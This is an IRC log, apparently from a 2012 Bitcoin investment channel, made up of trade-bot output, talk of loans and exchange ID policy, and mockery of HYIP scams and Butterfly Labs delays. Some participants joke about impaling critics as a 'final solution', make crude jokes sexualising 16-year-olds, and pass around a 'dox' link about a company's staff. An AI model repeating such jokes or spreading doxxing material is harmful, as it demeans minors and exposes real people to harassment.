11 02:10:18 [MPEX] [S.DICE] 781 @ 0.0032912 = 2.5704 BTC [-] Dec 11 02:26:47 far as i can tell it's been bought all day since x.s Dec 11 02:27:15 how much did you sell ? Dec 11 02:38:14 mircea_popescu you got bit4x for that ;) Dec 11 02:39:32 hm ? Dec 11 02:41:13 to short the world Dec 11 02:41:18 while stayin in bitcoin Dec 11 02:42:09 o lol Dec 11 02:42:20 kinda hard to short allianz via bit4x Dec 11 02:42:32 allianz? Dec 11 02:42:37 yeah Dec 11 02:43:35 ah Dec 11 02:43:45 i missed "financial inst." part Dec 11 02:44:13 :p Dec 11 02:45:21 !ticker X.EWTI Dec 11 02:45:22 [MPEX:X.EWTI] 1day: 0.06666667 / 0.06678667 / 0.066794 (1061 shares, 70.86 BTC), 30day: 0.06666667 / 0.06678667 / 0.066794 (1061 shares, 70.86 BTC) Dec 11 02:45:30 eee Dec 11 02:45:57 !ticker X.INDQ Dec 11 02:45:58 [MPEX:X.INDQ] 1day: 0.20633112 / 0.20633112 / 0.20633112 (251 shares, 51.79 BTC), 30day: 0.20633112 / 0.20633112 / 0.20633112 (251 shares, 51.79 BTC) Dec 11 02:46:07 !ticker X.MGCG Dec 11 02:46:08 [MPEX:X.MGCG] 1day: 0.13219995 / 0.13220548 / 0.13220833 (386 shares, 51.03 BTC), 30day: 0.13219995 / 0.13220548 / 0.13220833 (386 shares, 51.03 BTC) Dec 11 02:54:40 http://blog.e-gold.com/about-the-egold-blog.html Dec 11 02:54:44 most successful blog of all time Dec 11 03:09:52 Well looking to get a 100 BTC loan filled for 4 weeks. Dec 11 03:10:10 10% Dec 11 03:10:46 I offer 2%, no more. Dec 11 03:11:20 My previous BTC-BOND rate Dec 11 03:16:43 Namjies someone could just put the 100 in mpoe bonds and make 9.9% if last month holds ? Dec 11 03:17:13 too bad i didnt. Dec 11 03:26:59 the e-gold operation maintains microsoft sql servers detailing Dec 11 03:27:01 heh... Dec 11 03:28:14 "From these images of the servers and copies of the databases, I was able to Dec 11 03:28:14 reconstruct the customer profiles and transaction histories for e-gold account holders by Dec 11 03:28:14 transferring the database information on each account holder into a Microsoft Excel spreadsheet. Dec 11 03:28:14 " Dec 11 03:28:18 o god this is hilarious. Dec 11 03:29:31 what is this Dec 11 03:30:49 ima blogpost in a min Dec 11 03:31:46 google says http://www.google.com/url?sa=t&rct=j&q=reconstruct%20the%20customer%20profiles%20and%20transaction%20histories%20for%20e-gold%20account%20holders&source=web&cd=1&cad=rja&ved=0CC0QFjAA&url=http%3A%2F%2Fdocs.justia.com%2Fcases%2Ffederal%2Fdistrict-courts%2Fdistrict-of-columbia%2Fdcdce%2F1%3A2007cv01346%2F126695%2F1%2F1.pdf&ei=yIzGULnGMoS90AHfkoGQBQ&usg=AFQjCNFHFfbmSZeEWo7_go Dec 11 03:31:46 m0FAU10urkSQ Dec 11 03:31:54 jesus christ Dec 11 03:32:07 http://docs.justia.com/cases/federal/district-courts/district-of-columbia/dcdce/1:2007cv01346/126695/1/1.pdf Dec 11 03:32:30 mr. roy dotosn Dec 11 03:40:45 Oh well if anyone is interested anyway: https://btcjam.com/listings/899 Dec 11 03:45:57 [MPEX] [S.DICE] 1600 @ 0.0032912 = 5.2659 BTC [-] Dec 11 03:46:46 http://www.guardian.co.uk/books/2012/dec/04/paul-krugman-asimov-economics Dec 11 03:51:24 they still haven't shot krugman ? Dec 11 03:58:00 http://archive.org/about/faqs.php#311 http://archive.org/donate/ Dec 11 04:11:58 [MPEX] [S.MPOE] 4321 @ 0.00055037 = 2.3781 BTC [+] Dec 11 04:11:59 [MPEX] [S.MPOE] 7368 @ 0.00055008 = 4.053 BTC [-] Dec 11 04:13:29 Ahahah Dec 11 04:14:37 Open-source/non-profits/software cos adopt bitcoins every day. Dec 11 04:23:08 jcpham http://trilema.com/2012/law-enforcement-never-fails-to-unintentionally-entertain/ Dec 11 04:23:37 aa cool beans pigeons Dec 11 04:34:50 [MPEX] [S.MPOE] 4321 @ 0.00055137 = 2.3825 BTC [+] Dec 11 04:34:51 [MPEX] [S.MPOE] 30200 @ 0.00055154 = 16.6565 BTC [+] Dec 11 04:34:53 [MPEX] [S.MPOE] 20400 @ 0.00055161 = 11.2528 BTC [+] Dec 11 04:34:54 [MPEX] [S.MPOE] 9893 @ 0.00055239 = 5.4648 BTC [+] Dec 11 04:34:55 [MPEX] [S.MPOE] 10000 @ 0.000553 = 5.53 BTC [+] Dec 11 04:34:56 [MPEX] [S.MPOE] 25186 @ 0.00055318 = 13.9324 BTC [+] Dec 11 04:35:16 [MPEX] [S.MPOE] 4321 @ 0.00055014 = 2.3772 BTC [-] Dec 11 04:35:17 [MPEX] [S.MPOE] 17607 @ 0.00055008 = 9.6853 BTC [-] Dec 11 04:37:39 [MPEX] [S.MPOE] 4321 @ 0.00055295 = 2.3893 BTC [+] Dec 11 04:37:41 [MPEX] [S.MPOE] 214 @ 0.00055318 = 0.1184 BTC [+] Dec 11 04:37:42 [MPEX] [S.MPOE] 14200 @ 0.00055719 = 7.9121 BTC [+] Dec 11 04:37:42 [MPEX] [S.MPOE] 17700 @ 0.00055937 = 9.9008 BTC [+] Dec 11 04:40:07 [MPEX] [S.MPOE] 4321 @ 0.00056086 = 2.4235 BTC [+] Dec 11 04:40:08 [MPEX] [S.MPOE] 9137 @ 0.00056111 = 5.1269 BTC [+] Dec 11 04:43:28 [MPEX] [X.ENGG] 200 @ 0.27682136 = 55.3643 BTC Dec 11 04:54:06 [MPEX] [S.MPOE] 9750 @ 0.00056111 = 5.4708 BTC [+] Dec 11 04:57:55 [MPEX] [S.MPOE] 4321 @ 0.00056014 = 2.4204 BTC [-] Dec 11 04:57:57 [MPEX] [S.MPOE] 22743 @ 0.00056 = 12.7361 BTC [-] Dec 11 05:08:29 purplecelestina that's a nice name. Dec 11 05:09:00 thank you Dec 11 05:54:01 78749045d632e04f6c7bea776d1921bf1e76ed0e361d464fb2de861b2c38f595 Dec 11 05:54:16 when numbers match up in that way, it's damn spooky Dec 11 06:02:41 smickles: ??? Dec 11 06:04:35 Namjies: ??? Dec 11 06:06:08 ??? Dec 11 06:06:24 check the input and total output on that tx. the input was the conversion of one of our assets. The fact that it matched up, made me think that I did something horribly wrong until i rechecked the numbers Dec 11 06:07:16 and, 100 even? with so many destinations going out to the satoshi? Dec 11 06:07:22 what are the odds, eh? Dec 11 06:08:03 fuck Dec 11 06:08:25 when you sign a contract for $950k, you expect a motherfucker to call you back Dec 11 06:09:27 its almost nerve racking and shit Dec 11 06:09:34 You paid a few random holders and it ended up being EXACTLY 100 BTC? Dec 11 06:09:54 I recognize my address as well as some of my holders in there. Dec 11 06:10:07 praps a whiskey to calm the nerves Dec 11 06:10:38 How I manage to remember those addresses when I have a hard time remembering someone's name until I heard it for the thousandth time is beyond me. Dec 11 06:11:04 dub: 950k? I can't even relate, best I've done is ~100k and they bought me gin Dec 11 06:11:51 Namjies: I wouldn't call 'em random, they are the few who have made a claim so far Dec 11 06:12:05 heh, gave the guy a 95k check Dec 11 06:12:13 Well very odd. Dec 11 06:13:11 But not that odd either Dec 11 06:14:01 For example suppose you were paying 200 BTC or a round number and the current claimers happened to have a somewhat round number of shares, the payout would probably end up being a round number too. Dec 11 06:15:19 yeah, but i didn't expect it to happen because I'm not dealing with nice round percentages, and it included peeps who were getting their second payment and peeps getting their first and second payment in one Dec 11 06:16:26 Ah, in the case... Dec 11 06:18:16 pity it wasn't the lottery or something Dec 11 06:18:52 guy comes to trilema, asks for futures explanation post. half hour later, futures explanation post. i hope he's impressed. Dec 11 06:23:19 http://worldinvestmentgroups.com/ lmao Dec 11 06:40:40 [MPEX] [X.INKG] 25 @ 0.07407914 = 1.852 BTC Dec 11 06:46:22 https://bitcointalk.org/index.php?topic=130103.0 Dec 11 06:46:48 how does vorhees manage to not be called an idiot more often? Dec 11 06:48:35 [MPEX] [S.MPOE] 4321 @ 0.00056063 = 2.4225 BTC [+] Dec 11 06:48:36 [MPEX] [S.MPOE] 3479 @ 0.00056067 = 1.9506 BTC [+] Dec 11 07:00:10 [MPEX] [S.MPOE] 12721 @ 0.00056067 = 7.1323 BTC [+] Dec 11 07:00:12 [MPEX] [S.MPOE] 267 @ 0.00056111 = 0.1498 BTC [+] Dec 11 07:00:51 what we need is a bitcoin crusade Dec 11 07:02:28 to impale these 'serial entrepreneurs' on pikes and mount them at the gates of the intertubes Dec 11 07:03:00 a final solution for this tide of fucktardation Dec 11 07:31:48 dub: why do you think that? personally I think evorhees is about as far from "idiot" as one can get in the world of bitcoin writers/commentators. maybe that's why no one calls him that. Dec 11 07:45:10 toffoo: because he's advocating people talking to the media at significant conferences about bitcoin being for drugs and CP? Dec 11 07:46:22 that I don't see any displays of credibility other than an approach of; start a thousand 'businesses' and hope a couple stick Dec 11 07:46:23 [MPEX] [S.MPOE] 1696 @ 0.00056111 = 0.9516 BTC [+] Dec 11 07:46:24 [MPEX] [S.MPOE] 21328 @ 0.00056277 = 12.0028 BTC [+] Dec 11 07:46:47 clearly hitting a winner with dice, so far Dec 11 07:47:43 dub you mean the tshirt bruno made ? Dec 11 07:48:04 well the thread he created that in response to Dec 11 07:48:48 voorhees seems to have an atitude of its more important to try alot than have success Dec 11 07:49:06 i guess they be rumspringa-ing. still finding their bearings. Dec 11 07:49:53 sure but doing so in the pretense of representing the best and brightest of bitcoin? Dec 11 07:50:07 Don't hate on someone just because a silly quote is pulled out and trumpeted by a journalist... you should know better. Dec 11 07:50:07 Further, you can assume that most people have heard the blackmarket side of Bitcoin already. So by being frank about that, you can sometimes earn some honesty credits when you're meeting with people. Dec 11 07:50:13 seems reasonable. Dec 11 07:50:52 there is acknowledgment and there is advocacy Dec 11 07:51:20 and then there's the completely unfounded belief that conferences matter in any sense Dec 11 07:51:23 understandign that the media is want to twist things, extreme caution should be excercised in taht regard Dec 11 07:51:25 or, for that matter, "journalism" Dec 11 07:53:04 so its ok to cry 'misquote!' Dec 11 07:53:23 better not to raise it imo Dec 11 07:54:39 well that's all the excitement i can take for one day. later all Dec 11 07:54:50 nn **** BEGIN LOGGING AT Tue Dec 11 12:03:04 2012 Dec 11 12:16:38 pigeons http://www.talkgold.com/forum/r374217-.html there, hyip industry. Dec 11 12:18:36 that makes my head hurt Dec 11 12:18:38 http://www.talkgold.com/forum/f472-.html bitcoin being of course the top of the line in their main section Dec 11 12:19:25 i recently ran a web probe for bitcoin. it's save to say every last internet scammer/"finance" whatever/general bulshitter/scammer knows of btc by now. Dec 11 12:21:41 yes true, i just pasted this earlier when you were gone: http://www.intratechmontreal.com/index.php Dec 11 12:22:38 We produce a large quantity of product to our customer Dec 11 12:22:48 lettuce, i wonder ? Dec 11 12:23:15 IntraTech believe in BitCoin. We will provide you the hardware you need to be successful with BitCoin. Currently, we will only accept 300 orders. If thereafter the demand is still there, we will continue to accept order after the 300 first order. Dec 11 12:23:16 ahaha Dec 11 12:23:28 :) Dec 11 12:24:16 "Solidtrustpay scammed me ISSUE RESOLVED plus hundreds of people around the world" Dec 11 12:24:22 this is such a riot Dec 11 12:25:43 Please welcome the long term investment program StallionGold. StallionGold is precious metals holding and investment company offering its services to the international community of new generation of online investors. Dec 11 12:27:31 yeah a few years ago i knew a whole town, the sherrif, the barber, the teachers, everyone put all their money into one of those Dec 11 12:27:47 you would think they would be running out of suckers Dec 11 12:31:42 i dun think that's how it works Dec 11 12:32:33 [MPEX] [S.BVPS] 1220 @ 0.0040975 = 4.999 BTC [+] Dec 11 12:34:19 [MPEX] [S.MPOE] 4321 @ 0.00056797 = 2.4542 BTC [+] Dec 11 12:36:48 [MPEX] [S.MPOE] 2750 @ 0.00056811 = 1.5623 BTC [+] Dec 11 12:38:21 [MPEX] [S.DICE] 1650 @ 0.00332457 = 5.4855 BTC [+] Dec 11 12:40:38 [MPEX] [S.MPOE] 9359 @ 0.00056811 = 5.3169 BTC [+] Dec 11 12:48:22 [MPEX] [S.MPOE] 4482 @ 0.00056797 = 2.5456 BTC [-] Dec 11 12:48:23 [MPEX] [S.MPOE] 4321 @ 0.00056566 = 2.4442 BTC [-] Dec 11 12:48:24 [MPEX] [S.MPOE] 528 @ 0.0005655 = 0.2986 BTC [-] Dec 11 12:48:26 [MPEX] [S.MPOE] 151 @ 0.00056337 = 0.0851 BTC [-] Dec 11 12:49:32 [MPEX] [S.MPOE] 4321 @ 0.00056781 = 2.4535 BTC [+] Dec 11 12:49:34 [MPEX] [S.MPOE] 1836 @ 0.00056811 = 1.043 BTC [+] Dec 11 12:49:35 [MPEX] [S.MPOE] 10050 @ 0.0005694 = 5.7225 BTC [+] Dec 11 12:49:36 [MPEX] [S.MPOE] 7650 @ 0.00056954 = 4.357 BTC [+] Dec 11 12:49:37 [MPEX] [S.MPOE] 18400 @ 0.00056956 = 10.4799 BTC [+] Dec 11 12:49:38 [MPEX] [S.MPOE] 343 @ 0.00057041 = 0.1957 BTC [+] Dec 11 13:01:20 [MPEX] [S.MPOE] 4321 @ 0.00057024 = 2.464 BTC [-] Dec 11 13:01:21 [MPEX] [S.MPOE] 15957 @ 0.00057041 = 9.102 BTC [+] Dec 11 13:01:23 [MPEX] [S.MPOE] 2950 @ 0.00057252 = 1.6889 BTC [+] Dec 11 13:01:24 [MPEX] [S.MPOE] 8622 @ 0.00057389 = 4.9481 BTC [+] Dec 11 13:01:24 [MPEX] [S.MPOE] 1250 @ 0.00057644 = 0.7206 BTC [+] Dec 11 13:15:55 [MPEX] [S.MPOE] 5350 @ 0.00057644 = 3.084 BTC [+] Dec 11 13:17:11 ;;ticker Dec 11 13:17:12 BTCUSD ticker | Best bid: 13.43000, Best ask: 13.43001, Bid-ask spread: 0.00001, Last trade: 13.43000, 24 hour volume: 27962.67052584, 24 hour low: 13.26911, 24 hour high: 13.55000, 24 hour vwap: 13.44979 Dec 11 13:17:21 this is impressive, a week straight of 13.4-13.5 Dec 11 13:49:52 [MPEX] [S.MPOE] 5438 @ 0.00057644 = 3.1347 BTC [+] Dec 11 13:52:18 [MPEX] [S.MPOE] 12362 @ 0.00057644 = 7.126 BTC [+] Dec 11 13:52:20 [MPEX] [S.MPOE] 4863 @ 0.00057693 = 2.8056 BTC [+] Dec 11 13:53:56 [MPEX] [S.MPOE] 4321 @ 0.00056364 = 2.4355 BTC [-] Dec 11 13:53:57 [MPEX] [S.MPOE] 10399 @ 0.00056337 = 5.8585 BTC [-] Dec 11 13:53:59 [MPEX] [S.MPOE] 5480 @ 0.00056272 = 3.0837 BTC [-] Dec 11 14:27:55 [MPEX] [S.DICE] 875 @ 0.00333151 = 2.9151 BTC [+] Dec 11 14:34:41 [MPEX] [S.MPOE] 4321 @ 0.00056681 = 2.4492 BTC [+] Dec 11 14:34:43 [MPEX] [S.MPOE] 17317 @ 0.00056674 = 9.8142 BTC [-] Dec 11 14:34:44 [MPEX] [S.MPOE] 9612 @ 0.00056272 = 5.4089 BTC [-] Dec 11 14:36:40 [MPEX] [S.MPOE] 4321 @ 0.00056299 = 2.4327 BTC [+] Dec 11 14:36:42 [MPEX] [S.MPOE] 11508 @ 0.00056272 = 6.4758 BTC [-] Dec 11 14:36:43 [MPEX] [S.MPOE] 13877 @ 0.00056033 = 7.7757 BTC [-] Dec 11 14:58:38 [MPEX] [S.MPOE] 16664 @ 0.00056 = 9.3318 BTC [-] Dec 11 14:58:39 [MPEX] [S.MPOE] 2094 @ 0.0005587 = 1.1699 BTC [-] Dec 11 15:04:14 [MPEX] [S.MPOE] 12350 @ 0.0005587 = 6.8999 BTC [-] Dec 11 15:14:47 [MPEX] [S.MPOE] 15376 @ 0.00056021 = 8.6138 BTC [+] Dec 11 15:14:48 [MPEX] [S.MPOE] 28824 @ 0.00056105 = 16.1717 BTC [+] Dec 11 15:41:36 whats up all? Dec 11 15:45:39 [MPEX] [S.MPOE] 9050 @ 0.00056105 = 5.0775 BTC [+] Dec 11 15:50:45 dead in here? Dec 11 15:51:52 hey giga Dec 11 15:52:14 good morning Dec 11 15:52:23 or evening where you are :) Dec 11 15:52:35 :) Dec 11 15:57:36 [MPEX] [S.MPOE] 7498 @ 0.0005587 = 4.1891 BTC [-] Dec 11 16:07:18 mornin Dec 11 16:17:52 o hi Dec 11 16:18:20 hello all Dec 11 16:18:46 [MPEX] [S.MPOE] 3202 @ 0.00055643 = 1.7817 BTC [-] Dec 11 16:19:17 ;;rate jurov 1 paid the loan promptly Dec 11 16:19:19 Rating entry successful. Your rating of 1 for user jurov has been recorded. Dec 11 16:19:34 just had a thought, wonder if anyone is doing something along these lines with assets/dividends to avoid glbse probs. Dec 11 16:20:30 1) electrum style asset register where priv keys are stored with the user, Dec 11 16:20:57 pub keys are given to issuer to issue divs, Dec 11 16:21:20 priv keys are used to buy/sell against a register? Dec 11 16:22:20 can't see how bitcoin/litecoin global /btc.to etc are avoiding all the glbse style damage. Dec 11 16:37:23 [MPEX] [S.MPOE] 4300 @ 0.00055839 = 2.4011 BTC [+] Dec 11 17:03:52 unless all exchanges start to dox their clientele and do proper reporting for different countries, they will eventually come under the thumb of tax reguators Dec 11 17:04:11 just sayin Dec 11 17:17:57 [MPEX] [S.MPOE] 4321 @ 0.00056077 = 2.4231 BTC [+] Dec 11 17:17:59 [MPEX] [S.MPOE] 19454 @ 0.00056105 = 10.9147 BTC [+] Dec 11 18:13:01 [MPEX] [S.MPOE] 4321 @ 0.00055873 = 2.4143 BTC [-] Dec 11 18:13:03 [MPEX] [S.MPOE] 4525 @ 0.00055839 = 2.5267 BTC [-] Dec 11 18:13:04 [MPEX] [S.MPOE] 11304 @ 0.0005563 = 6.2884 BTC [-] Dec 11 18:15:06 [MPEX] [S.MPOE] 2296 @ 0.0005563 = 1.2773 BTC [-] Dec 11 18:15:06 [MPEX] [S.MPOE] 25754 @ 0.00055554 = 14.3074 BTC [-] Dec 11 18:57:46 [MPEX] [S.MPOE] 4321 @ 0.000561 = 2.4241 BTC [+] Dec 11 18:57:47 [MPEX] [S.MPOE] 3172 @ 0.00056105 = 1.7797 BTC [+] Dec 11 18:57:49 [MPEX] [S.MPOE] 3300 @ 0.00056145 = 1.8528 BTC [+] Dec 11 18:58:19 anyone know what the minimum btc trade on mtgox is? I appear to be getting an unreadable red message with Ple|Gre|Equ cut off by the stupid layering html scheme that has a background with a higher priority... Dec 11 18:58:40 than an error message... Dec 11 18:59:27 markedathome: classic.mtgox.com Dec 11 18:59:32 it has less fluff Dec 11 19:02:03 well, slightly more readable - and 0.01 BTC Dec 11 19:04:09 um, nobody added a new GPG story past 2 weeks? Dec 11 19:23:56 [MPEX] [S.DICE] 383 @ 0.00333151 = 1.276 BTC [+] Dec 11 19:23:57 [MPEX] [S.DICE] 2750 @ 0.00336849 = 9.2633 BTC [+] Dec 11 19:23:59 [MPEX] [S.DICE] 1500 @ 0.00339513 = 5.0927 BTC [+] Dec 11 19:24:00 [MPEX] [S.DICE] 17 @ 0.0034 = 0.0578 BTC [+] Dec 11 19:28:12 [MPEX] [S.MPOE] 4321 @ 0.00056119 = 2.4249 BTC [-] Dec 11 19:28:14 [MPEX] [S.MPOE] 20929 @ 0.00056145 = 11.7506 BTC [+] Dec 11 19:30:25 jurov: yeah, I got halfway thru a story, then haven't had time since :( Dec 11 19:30:50 I modeled mine off of "Ragged Dick" Dec 11 19:31:34 and I hope to finish it sometime soon and publish it regardless of the MP contest Dec 11 19:43:19 [MPEX] [S.MPOE] 4321 @ 0.00055836 = 2.4127 BTC [-] Dec 11 19:43:21 [MPEX] [S.MPOE] 5100 @ 0.00055831 = 2.8474 BTC [-] Dec 11 19:43:22 [MPEX] [S.MPOE] 5346 @ 0.00055554 = 2.9699 BTC [-] Dec 11 19:43:23 [MPEX] [S.MPOE] 6083 @ 0.00055198 = 3.3577 BTC [-] Dec 11 19:55:43 [MPEX] [S.MPOE] 4321 @ 0.00055219 = 2.386 BTC [+] Dec 11 19:55:45 [MPEX] [S.MPOE] 10979 @ 0.00055198 = 6.0602 BTC [-] Dec 11 20:15:22 jurov i knew that was gonna happen Dec 11 20:26:01 lol moar bfl delays ? Dec 11 20:26:06 [MPEX] [S.MPOE] 2800 @ 0.00056111 = 1.5711 BTC [+] Dec 11 20:34:11 [MPEX] [S.MPOE] 1521 @ 0.00056111 = 0.8534 BTC [+] Dec 11 20:34:12 [MPEX] [S.MPOE] 21 @ 0.00056145 = 0.0118 BTC [+] Dec 11 20:34:16 [MPEX] [S.MPOE] 19358 @ 0.0005621 = 10.8811 BTC [+] Dec 11 20:53:20 dub https://bitcointalk.org/index.php?topic=130103.msg1391832#msg1391832 Dec 11 20:53:22 owned. Dec 11 20:53:57 markedathome congratulations, you've sorta half-done mpex. Dec 11 20:54:29 er, what? Dec 11 21:03:04 just had a thought, wonder if anyone is doing something along these lines with assets/dividends to avoid glbse probs. Dec 11 21:03:28 oh right yes, Dec 11 21:03:57 sorry - i thought you thought that i had posted in the thread above. Dec 11 21:04:47 a no Dec 11 21:04:57 but otherwise yes, gpg is the correct way to handle that. Dec 11 21:07:54 mircea_popescu: ignoring the 'joke' defense jgarzik answers pretty well Dec 11 21:08:05 orly ?! Dec 11 21:08:15 well, stay tuned, the girl's about to tear into him. Dec 11 21:13:16 wrt the joke defense, its a pet annouyance that people seem to think an unidentifiably sarcastic remark equals humour, notwithstanding, parroting the most commonly held myths about bitcoin hardly even qualifies as that. Dec 11 21:15:43 [MPEX] [S.MPOE] 4321 @ 0.00056189 = 2.4279 BTC [-] Dec 11 21:15:44 [MPEX] [S.MPOE] 4321 @ 0.0005619 = 2.428 BTC [+] Dec 11 21:15:46 [MPEX] [S.MPOE] 726 @ 0.0005621 = 0.4081 BTC [+] Dec 11 21:15:47 [MPEX] [S.MPOE] 11682 @ 0.00056762 = 6.6309 BTC [+] Dec 11 21:16:18 and 'any PR is good PR'? please Dec 11 21:19:53 who would you say is the top PR on btctalk atm ? Dec 11 21:23:06 I'd have to think about it, not your girl. while I usually agree and get a few chuckles the delivery is often counter productive Dec 11 21:23:14 maybe Meni despite his problems Dec 11 21:23:18 who's meni a pr for ? Dec 11 21:23:28 himself? Dec 11 21:23:51 heh. ok, i'm abandoning this conversation, you're beyond confused. Dec 11 21:23:55 one of the bitinstant guys? Dec 11 21:24:10 charlie / yankee Dec 11 21:24:14 possibly. Dec 11 21:24:32 although we'll know better once they hit a major crisis Dec 11 21:24:42 kinda where prs are proven Dec 11 21:25:49 they aren't PR as such, but they do their own business pr IIRC. they are good for their business and sometimes intercede in other business events. don't know about their abilities as bitcoin proponents unless there are some audio / vids around Dec 11 21:26:32 markedathome the only point was about which pr is good/bad. Dec 11 21:27:27 well Dec 11 21:27:33 there arent that many to choose from Dec 11 21:27:46 is evorhees the one who did the new hampshire thing back in march / april this year? Dec 11 21:29:25 [MPEX] [X.ACOG] 1602 @ 0.05710061 = 91.4752 BTC Dec 11 21:29:26 [MPEX] [X.ACOG] 898 @ 0.05713408 = 51.3064 BTC [+] Dec 11 21:29:26 which one is that ? Dec 11 21:29:54 [MPEX] [X.AWHG] 1000 @ 0.0670108 = 67.0108 BTC Dec 11 21:32:36 ah found it, he testified in state house https://bitcointalk.org/index.php?topic=64034.0 Dec 11 21:37:24 nh has a house ?! Dec 11 21:38:53 pretty cool. Dec 11 21:45:30 looking increasingly like im not going to have a house this week Dec 11 21:46:30 agent is being a dick, going to withdraw our offer if he hasnt communicated in the next 3 hours Dec 11 21:56:48 maybe that 16 yo 7/11 clerk he's been eyeing for weeks finaly gave it out in the parking lot. Dec 11 21:56:51 have a heart. Dec 11 21:59:09 well for the ~$50k commision im sure he could rent a number of 16 y/o Dec 11 22:03:40 [MPEX] [S.MPOE] 4321 @ 0.00056054 = 2.4221 BTC [-] Dec 11 22:03:42 [MPEX] [S.MPOE] 22400 @ 0.00056025 = 12.5496 BTC [-] Dec 11 22:03:43 [MPEX] [S.MPOE] 2079 @ 0.00055198 = 1.1476 BTC [-] Dec 11 22:32:25 http://trilema.com/2012/voluntary-contracts-after-a-while/#comment-90923 Dec 11 22:32:31 prizes sent to all 3 participants lol. Dec 11 22:51:57 [MPEX] [X.ENGG] 291 @ 0.27682136 = 80.555 BTC Dec 11 22:51:59 [MPEX] [X.ENGG] 159 @ 0.27703788 = 44.049 BTC [+] Dec 11 22:52:46 i almost got another one, but the writer bailed out off the project Dec 11 22:54:36 the advantages of contemporary education Dec 11 22:54:45 average young adult is unable to write five pages. Dec 11 23:00:53 dunno, it's not education exactly. i used to wrote hilarious essays as a child Dec 11 23:01:06 then it got worn off somehow Dec 11 23:01:13 hm Dec 11 23:07:07 https://bitcointalk.org/index.php?topic=130117.msg1393343#msg1393343 :) Dec 11 23:16:14 [MPEX] [S.MPOE] 9050 @ 0.00055716 = 5.0423 BTC [+] Dec 11 23:31:46 http://i.minus.com/iWQplxdpm5kjI.gif Dec 11 23:33:26 http://tools.pingdom.com/fpt/#!/mKgQEmPtd/http://polimedia.us/bitcoin/mpex.php Dec 11 23:33:31 ahaha .5 seconds frw. Dec 11 23:36:30 thats cool, firebug in the coud Dec 11 23:36:33 cloud* Dec 11 23:40:36 here is the correct slip n slide technique http://i.imgur.com/I4MeF.gif Dec 11 23:43:27 wtf is up wit bitcoin-central Dec 11 23:44:33 ? Dec 11 23:44:54 dub : it's not in the cloud. Dec 11 23:45:21 hao so? Dec 11 23:47:05 um ? cause i own the servers ? Dec 11 23:47:28 are they backed up? Dec 11 23:47:35 no. Dec 11 23:47:41 thats silly Dec 11 23:48:10 bitcoin-central is betting an IBAN... Dec 11 23:48:20 or is iy BIN... Dec 11 23:50:38 they're making it so any customer gets iban Dec 11 23:50:42 from what i gather Dec 11 23:53:23 if that IBAN thing resembles anything like bank account they'll require IDs pretty soon Dec 11 23:53:44 i thought they required ids already ? Dec 11 23:53:57 and ofcourse it does, that's what iban is, euro acct number. Dec 11 23:55:19 they don't specifically mention that anywhere Dec 11 23:56:19 and davout is not putting any definite answer either: https://bitcointalk.org/index.php?topic=129461.msg1388689#msg1388689 Dec 11 23:58:00 jesus that thing's 21 pages by now Dec 11 23:58:32 jurov: what is your question ? Dec 11 23:58:52 davout, whether you're going to ask IDs Dec 11 23:59:09 we already ask for IDs if you deposit more than 250€ Dec 11 23:59:20 or if you withdraw to a bank acct Dec 12 00:00:13 thanks. that information is quite hard to find. Dec 12 00:01:10 it's buried in the AML/KYC policy in the ToS Dec 12 00:01:18 i agree it could be a little clearer Dec 12 00:01:27 thing is Dec 12 00:01:53 unlike mtgox we don't freeze funds if you refuse to ID Dec 12 00:02:05 we simply send funds back from where they came Dec 12 00:02:14 which is basically what the law is saying Dec 12 00:02:32 mtgox does lots of shit it isn't legally required to do Dec 12 00:03:00 theoretically we should ID everyone all the time Dec 12 00:03:37 but we told our financial partner that it would just not work in the bitcoin world so they agreed on having a threshold under which we won't require IDs Dec 12 00:03:42 mircea_popescu: you own pingdom? Dec 12 00:04:05 dub we obviously are talking of diff things Dec 12 00:04:32 yea, firebug is a ff extension that does teh same thing as pingdom locally Dec 12 00:04:38 o Dec 12 00:04:41 i don't use/know ff Dec 12 00:04:47 firefox Dec 12 00:06:09 alos, when I say 'in the cloud' its with tounge in cheek and means 'on the internet' Dec 12 00:06:21 well that part got lost Dec 12 00:06:25 becuase thats what cloud is a stupid marketing term for Dec 12 00:08:03 to the cloud, batman Dec 12 00:12:06 [MPEX] [S.MPOE] 4801 @ 0.00056594 = 2.7171 BTC [+] Dec 12 00:12:08 [MPEX] [S.MPOE] 4321 @ 0.0005675 = 2.4522 BTC [+] Dec 12 00:12:09 [MPEX] [S.MPOE] 16078 @ 0.00056762 = 9.1262 BTC [+] **** BEGIN LOGGING AT Wed Dec 12 08:51:09 2012 Dec 12 08:51:33 smickles neither mpoe nor mpex nor i mm the new futures. Dec 12 08:54:16 hey mircea_popescu smickles Dec 12 08:54:26 sup Dec 12 08:54:35 https://bitcointalk.org/index.php?topic=129566.msg1392977#msg1392977 Dec 12 08:55:20 mircea_popescu: save a copy of that post somewhere just in case it goes Dec 12 08:56:08 lol moar bruno private dickery ? Dec 12 08:57:02 mircea_popescu: its bfl dox. Dec 12 08:57:18 https://btct.co/security/BAKEWELL Dec 12 08:57:20 I dont care where he got them or who he is, I do not imagine they will stay on the forums for very long Dec 12 08:57:26 can we ban Tiggr for now ? Dec 12 08:58:14 pigeons: dont make me sad bro :P Dec 12 08:58:16 sure if someone had ops Dec 12 09:04:53 Tiggr added to ignore list. Dec 12 09:05:09 ~MrTiggr@ec2-122-248-235-44.ap-southeast-1.compute.amazonaws.com added to ignore list. Dec 12 09:06:01 bfl is really inept. who the fuck announces their 3rd delay on the 2nd product after having promised "not to repeat the 1st product delays" Dec 12 09:06:08 in the terms of "not shipping BEFORE x date". Dec 12 09:06:14 ;;later tell tiggr join less channels tard Dec 12 09:06:14 The operation succeeded. Dec 12 09:06:31 ~MrTiggr@* added to ignore list. Dec 12 09:06:45 /ignore works dub Dec 12 09:07:08 yep Dec 12 09:07:14 ~MrTiggr@*.* added to ignore list. Dec 12 09:07:29 Tiggr!*@* added to ignore list. Dec 12 09:07:31 which comes first, pirate repayment or bfl asics? Dec 12 09:08:40 lol the ole 500,000 BTC question Dec 12 09:08:56 *!Tiggr*@* added to ignore list. Dec 12 09:09:37 *!*Tiggr@* added to ignore list. Dec 12 09:10:05 Tiggr!*@* added to ignore list. Dec 12 09:13:32 *!~MrTiggr@ec2-122-248-235-44.ap-southeast-1.compute.amazonaws.com added to ignore list. Dec 12 09:22:02 Diablo-D3: just wanted to say. You'r awsome. :P Dec 12 09:22:09 your're Dec 12 09:22:11 jfdfhgh Dec 12 09:22:12 oh? Dec 12 09:22:13 too tired to type Dec 12 09:22:15 "you are" Dec 12 09:22:16 there Dec 12 09:22:43 what did I do? Dec 12 09:22:48 *!~MrTiggr@* added to ignore list. Dec 12 